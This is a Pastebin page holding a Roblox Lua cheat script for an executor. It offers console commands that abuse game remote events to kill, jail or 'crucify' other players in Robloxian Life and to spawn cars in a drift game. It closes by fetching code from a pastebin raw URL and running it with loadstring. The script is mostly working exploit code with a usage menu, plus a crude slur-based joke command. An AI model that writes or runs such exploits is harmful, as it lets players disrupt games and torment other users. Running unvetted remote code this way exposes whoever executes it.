Advertisement
970dawqdwuyadusadyhs

Untitled

Jul 28th, 2020 (edited)
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.34 KB | None | 0 0
  1. local Players = game:GetService("Players")
  2. local LocalPlayer = Players.LocalPlayer
  3. local Character = LocalPlayer.Character
  4. local Mouse = LocalPlayer:GetMouse()
  5.  
  6.  
  7.  
  8.  
  9. local function RemoveSpaces(String)
  10. return String:gsub("%s+", "") or String
  11. end
  12.  
  13. local function FindPlayer(String)
  14. String = RemoveSpaces(String)
  15. for _, _Player in pairs(Players:GetPlayers()) do
  16. if _Player.Name:lower():match('^'.. String:lower()) then
  17. return _Player
  18. end
  19. end
  20. return nil
  21. end
  22.  
  23.  
  24. local function run_cmd(cmd)
  25. if cmd:match("clear") then
  26. rconsoleclear()
  27. end
  28. if cmd:match("rejoin") then
  29. local ts = game:GetService("TeleportService")
  30. local p = game:GetService("Players").LocalPlayer
  31.  
  32. ts:Teleport(game.PlaceId, p)
  33. end
  34. if cmd:match("evo") then
  35. game.ReplicatedStorage.SpawnCar:FireServer("JAP_evo")
  36. end
  37. if cmd:match("rx7") then
  38. game.ReplicatedStorage.SpawnCar:FireServer("JAP_rx7")
  39. end
  40. if cmd:match("korv") then
  41. game.ReplicatedStorage.SpawnCar:FireServer("KOR_korv")
  42. end
  43. if cmd:match("pinki") then
  44. game.ReplicatedStorage.SpawnCar:FireServer("KOR_pinki")
  45. end
  46.  
  47.  
  48. if cmd:sub(1,7) == "unjail " then
  49. local target = FindPlayer(cmd:sub(8))
  50. for i,v in pairs(game.Players.LocalPlayer.Character.HumanoidRootPart:GetChildren()) do
  51. if v.Name == "EffectCloud" then
  52. if v:FindFirstChild("Weld") then
  53. if v.Weld.Part0.Parent.Name == target.Name then
  54. v:Destroy()
  55. else
  56. print(v.Weld.Part0.Parent.Name)
  57. end
  58. end
  59. end
  60. end
  61. end
  62.  
  63. if cmd:sub(1,6) == "lvoid " then
  64. local target = FindPlayer(cmd:sub(7))
  65. table.insert(_G.loopvoid, target.Name)
  66. end
  67. if cmd:sub(1,8) == "unlvoid " then
  68. local target = FindPlayer(cmd:sub(9))
  69. for i = 1,#_G.loopvoid do
  70. local v = _G.loopvoid[i]
  71. if v == target.Name then
  72. table.remove(_G.loopvoid,i)
  73. end
  74. end
  75. end
  76.  
  77. if cmd:sub(1,5) == "jail " then
  78.  
  79. local target = FindPlayer(cmd:sub(6))
  80.  
  81. game:GetService("Workspace").GuiEvent:FireServer("#")
  82. local rpname = game.Players.LocalPlayer.Character:WaitForChild("#")
  83. local effcloud = rpname:WaitForChild("Head")
  84. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="EffectCloud",["Property"]="Name",["Object"]=effcloud})
  85. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=game.Players.LocalPlayer.Character.HumanoidRootPart,["Property"]="Parent",["Object"]=effcloud})
  86.  
  87. for i,v in pairs(game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud:GetChildren()) do
  88. if v.Name == "Mesh" then
  89.  
  90. else
  91. if v.Name == "Weld" then
  92.  
  93. else
  94. v:Destroy()
  95. end
  96. end
  97.  
  98. end
  99.  
  100. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=game.Lighting,["Property"]="Parent",["Object"]=game.Players.LocalPlayer.Character["#"]})
  101. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=0,["Property"]="Transparency",["Object"]=game.Players.LocalPlayer.Character.Head})
  102.  
  103. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=0,["Property"]="Transparency",["Object"]=effcloud})
  104. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="",["Property"]="TextureId",["Object"]=effcloud.Mesh})
  105. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="rbxassetid://478075544",["Property"]="MeshId",["Object"]=effcloud.Mesh})
  106. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Vector3.new(0.022, 0.03, 0.022),["Property"]="Scale",["Object"]=effcloud.Mesh})
  107. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Color3.fromRGB(50,50,50),["Property"]="Color",["Object"]=effcloud})
  108. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Vector3.new(0, 0,0),["Property"]="Offset",["Object"]=effcloud.Mesh})
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=effcloud,["Property"]="Part1",["Object"]=effcloud.Weld})
  119. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character.HumanoidRootPart,["Property"]="Part0",["Object"]=effcloud.Weld})
  120.  
  121. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=true,["Property"]="Anchored",["Object"]=effcloud})
  122.  
  123.  
  124. end
  125.  
  126.  
  127.  
  128. if cmd:sub(1,8) == "crucify " then
  129. local target = FindPlayer(cmd:sub(9))
  130.  
  131.  
  132. local Remote = game.Players.LocalPlayer.Character.PompousTheCloud['ServerControl']
  133.  
  134. local Arguments = {
  135. [1] = "Fly",
  136. [2] = {["Flying"] = true}
  137. }
  138.  
  139. Remote:InvokeServer(unpack(Arguments))
  140.  
  141. local weld = game.Players.LocalPlayer.Character.PompousTheCloud:WaitForChild("EffectCloud"):WaitForChild("Weld")
  142.  
  143.  
  144. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="",["Property"]="Part1",["Object"]=weld})
  145. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character.Head,["Property"]="Part0",["Object"]=weld})
  146. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=true,["Property"]="Anchored",["Object"]=weld.Parent})
  147. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=CFrame.new(target.Character.HumanoidRootPart.Position),["Property"]="CFrame",["Object"]=weld.Parent})
  148. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character.HumanoidRootPart,["Property"]="Part1",["Object"]=weld})
  149. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character.Head,["Property"]="Part0",["Object"]=weld})
  150. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=CFrame.new(0,-1.55,-0.2)* CFrame.Angles(math.rad(30), 0, 0),["Property"]="C0",["Object"]=weld})
  151. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character,["Property"]="Parent",["Object"]=weld})
  152.  
  153.  
  154.  
  155.  
  156. local Remote = game.Players.LocalPlayer.Character.PompousTheCloud['ServerControl']
  157.  
  158. local Arguments = {
  159. [1] = "Fly",
  160. [2] = {["Flying"] = true}
  161. }
  162.  
  163. Remote:InvokeServer(unpack(Arguments))
  164. wait(0.2)
  165. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=game.Players.LocalPlayer.Character.HumanoidRootPart,["Property"]="Parent",["Object"]=game.Players.LocalPlayer.Character.PompousTheCloud.EffectCloud})
  166.  
  167. wait(0.2)
  168. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=0,["Property"]="Transparency",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud})
  169. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="",["Property"]="TextureId",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Mesh})
  170. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="rbxassetid://4824155414",["Property"]="MeshId",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Mesh})
  171. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Vector3.new(0.5, 0.5, 0.5),["Property"]="Scale",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Mesh})
  172. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Color3.fromRGB(5,5,5),["Property"]="Color",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud})
  173.  
  174. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Vector3.new(-0.72, 3.6, -1),["Property"]="Offset",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Mesh})
  175.  
  176.  
  177.  
  178. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character.HumanoidRootPart,["Property"]="Part0",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Weld})
  179. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=true,["Property"]="Anchored",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud})
  180. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Vector3.new(target.Character.HumanoidRootPart.Position.X, target.Character.HumanoidRootPart.Position.Y + 1, target.Character.HumanoidRootPart.Position.Z),["Property"]="Position",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud})
  181.  
  182. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=Color3.fromRGB(255,0,0),["Property"]="Color",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Smoke})
  183. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=3,["Property"]="Size",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Smoke})
  184. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=0.1,["Property"]="Opacity",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Smoke})
  185. if game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud:FindFirstChild("Wind") then
  186. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=111,["Property"]="Volume",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Wind})
  187. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=5,["Property"]="EmitterSize",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Wind})
  188. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=5321,["Property"]="MaxDistance",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Wind})
  189. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=1,["Property"]="PlaybackSpeed",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Wind})
  190. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="rbxassetid://5112946226",["Property"]="SoundId",["Object"]=game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Wind})
  191. game.Players.LocalPlayer.Character.HumanoidRootPart.EffectCloud.Wind:Play()
  192. end
  193.  
  194. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=game.Players.LocalPlayer.Character.Head.Mesh,["Property"]="Parent",["Object"]=game.Players.LocalPlayer.Character.Head.face})
  195. game:GetService("Workspace").GuiEvent:FireServer("blood")
  196. local decal = game.Players.LocalPlayer.Character:WaitForChild("blood"):WaitForChild("Head"):WaitForChild("Mesh"):WaitForChild("face")
  197.  
  198.  
  199. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="rbxassetid://148712227",["Property"]="Texture",["Object"]=decal})
  200. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="Front",["Property"]="Face",["Object"]=decal})
  201. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character.Torso,["Property"]="Parent",["Object"]=decal})
  202. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=game.Lighting,["Property"]="Parent",["Object"]=game.Players.LocalPlayer.Character.blood})
  203. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=0,["Property"]="Transparency",["Object"]=game.Players.LocalPlayer.Character.Head})
  204. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=game.Players.LocalPlayer.Character.Head,["Property"]="Parent",["Object"]=game.Players.LocalPlayer.Character.Head.Mesh.face})
  205. end
  206.  
  207.  
  208.  
  209.  
  210.  
  211. if cmd:match("lambo") then
  212. game.ReplicatedStorage.SpawnCar:FireServer("MASS_lambo")
  213. end
  214. if cmd:sub(1,7) == "volume " then
  215. local target = cmd:sub(8)
  216. local username = game.Players.LocalPlayer.Name
  217. workspace[username .. "sCars"][username .. "sCar"].DriveSeat.AuidoPlayerEvent:FireServer(target, 3)
  218. end
  219. if cmd:match("supra") then
  220. game.ReplicatedStorage.SpawnCar:FireServer("SUP_toyota")
  221. end
  222.  
  223. if cmd:match("exploiters") then
  224. for i,v in pairs(game.Players:GetChildren()) do
  225. for i,tool in pairs(v.Character:GetChildren()) do
  226. if tool:FindFirstChild("ServerControl") then
  227. rconsoleprint('@@LIGHT_GREEN@@')
  228. rconsoleprint(v.Name .. " has a cloud in their character\n")
  229. rconsoleprint('@@WHITE@@')
  230. end
  231. end
  232. end
  233. end
  234.  
  235.  
  236.  
  237. if cmd:sub(1,5) == "kill " then
  238. if cmd:sub(6) == "all" then
  239. for i,v in pairs(game:GetService("Players"):GetChildren()) do
  240. if (v:IsA("Player")) then
  241. if v.Name == player.Name then
  242. else
  243. local Remote = game.Players.LocalPlayer.Character.PompousTheCloud['ServerControl']
  244.  
  245. local Arguments = {
  246. [1] = "Fly",
  247. [2] = {["Flying"] = true}
  248. }
  249.  
  250. Remote:InvokeServer(unpack(Arguments))
  251.  
  252. local kill_part = game.Players.LocalPlayer.Character.PompousTheCloud:WaitForChild("EffectCloud")
  253. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="Head",["Property"]="Name",["Object"]=kill_part})
  254. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=v.Character,["Property"]="Parent",["Object"]=kill_part})
  255. end
  256. end
  257. end
  258. else
  259. local target = FindPlayer(cmd:sub(6))
  260. local Remote = game.Players.LocalPlayer.Character.PompousTheCloud['ServerControl']
  261.  
  262. local Arguments = {
  263. [1] = "Fly",
  264. [2] = {["Flying"] = true}
  265. }
  266.  
  267. Remote:InvokeServer(unpack(Arguments))
  268.  
  269. local kill_part = game.Players.LocalPlayer.Character.PompousTheCloud:WaitForChild("EffectCloud")
  270. kill_part.Weld:Destroy()
  271. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]="Head",["Property"]="Name",["Object"]=kill_part})
  272. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=target.Character,["Property"]="Parent",["Object"]=kill_part})
  273.  
  274. local Arguments = {
  275. [1] = "Fly",
  276. [2] = {["Flying"] = false}
  277. }
  278.  
  279. Remote:InvokeServer(unpack(Arguments))
  280. end
  281. end
  282.  
  283.  
  284.  
  285. if cmd:match("rsmoke") then
  286. game.Players.LocalPlayer.Character.PompousTheCloud.ServerControl:InvokeServer("SetProperty",{["Value"]=workspace,["Property"]="Parent",["Object"]=game.Players.LocalPlayer.Character.PompousTheCloud.EffectCloud.Smoke})
  287. end
  288.  
  289. if cmd:sub(1,6) == "idlog " then
  290. if cmd:sub(7) ~= nil then
  291. local target = FindPlayer(cmd:sub(7))
  292. print(target.Name)
  293. for i,sound in pairs(target.Character:GetDescendants()) do
  294. if sound:IsA("Sound") then
  295. if sound.Playing == true then
  296. if sound.Parent == game.Players.LocalPlayer.Character.HumanoidRootPart then
  297. else
  298. rconsoleprint('@@LIGHT_GREEN@@')
  299. local id = sound.SoundId:match("%d+")
  300. rconsoleprint("rbxassetid://" .. tostring(id) .. ", " .. game:GetService("MarketplaceService"):GetProductInfo(id).Name .. ", Path " .. sound:GetFullName() .. "\n")
  301. rconsoleprint('@@WHITE@@')
  302. end
  303. end
  304. end
  305. end
  306. end
  307. end
  308.  
  309. if cmd:sub(1,5) == "goto " then
  310. local target = FindPlayer(cmd:sub(6))
  311. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = target.Character.HumanoidRootPart.CFrame
  312. end
  313. if cmd:match("gay") then
  314. rconsolewarn("You are " .. math.random(0,100) .. "% gay.")
  315. end
  316. if cmd:match("exit") then
  317. game:Shutdown()
  318. end
  319.  
  320. if cmd:match("cmds") then
  321.  
  322. rconsoleerr("clear //Clears console")
  323. rconsoleerr("cmds //Prints all available commands")
  324. rconsoleerr("goto <plr> //Teleports to target")
  325. rconsoleerr("gay //Shows how gay you are")
  326. rconsoleerr("exit //Closes roblox")
  327. rconsoleerr("rejoin //Rejoins the server")
  328. rconsoleerr("idlog //Gets active audios from target's character and prints their ID together with their name and path")
  329. rconsoleerr("")
  330. if game.PlaceId == 5061145187 then
  331. rconsolewarn("Volvo Drift Commands")
  332. rconsoleerr("rx7 //Spawns Mazda RX-7")
  333. rconsoleerr("evo //Spawns Mitsubishi Evo")
  334. rconsoleerr("supra //Spawns Toyota Supra MK4")
  335. rconsoleerr("lambo //Spawns Lamborgini")
  336. rconsoleerr("korv //Spawns hotdog car")
  337. rconsoleerr("pinki //Spawns pink lowrider")
  338. rconsoleerr("volume <vol> //default game limit is 5, this allows you to use 10. Only works on some cars.")
  339. end
  340. if game.PlaceId == 531492495 then
  341. rconsolewarn("Robloxian Life Commands")
  342. rconsoleerr("exploiters //Shows all exploiters (not 100% accurate)")
  343. rconsoleerr("kill <plr, all> //Kills target")
  344. rconsoleerr("rsmoke //Removes annoying ass EffectCloud smoke")
  345. rconsoleerr("jail <plr> //Locks target up")
  346. rconsoleerr("antijail <plr> //Removes jail")
  347. end
  348. end
  349. end
  350.  
  351.  
  352.  
  353. makefolder("Delta")
  354. local script = game:HttpGet("https://pastebin.com/raw/3ExFe4ah", true)
  355. run_cmd(tostring(rconsoleinputasync()))
  356. loadstring(script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement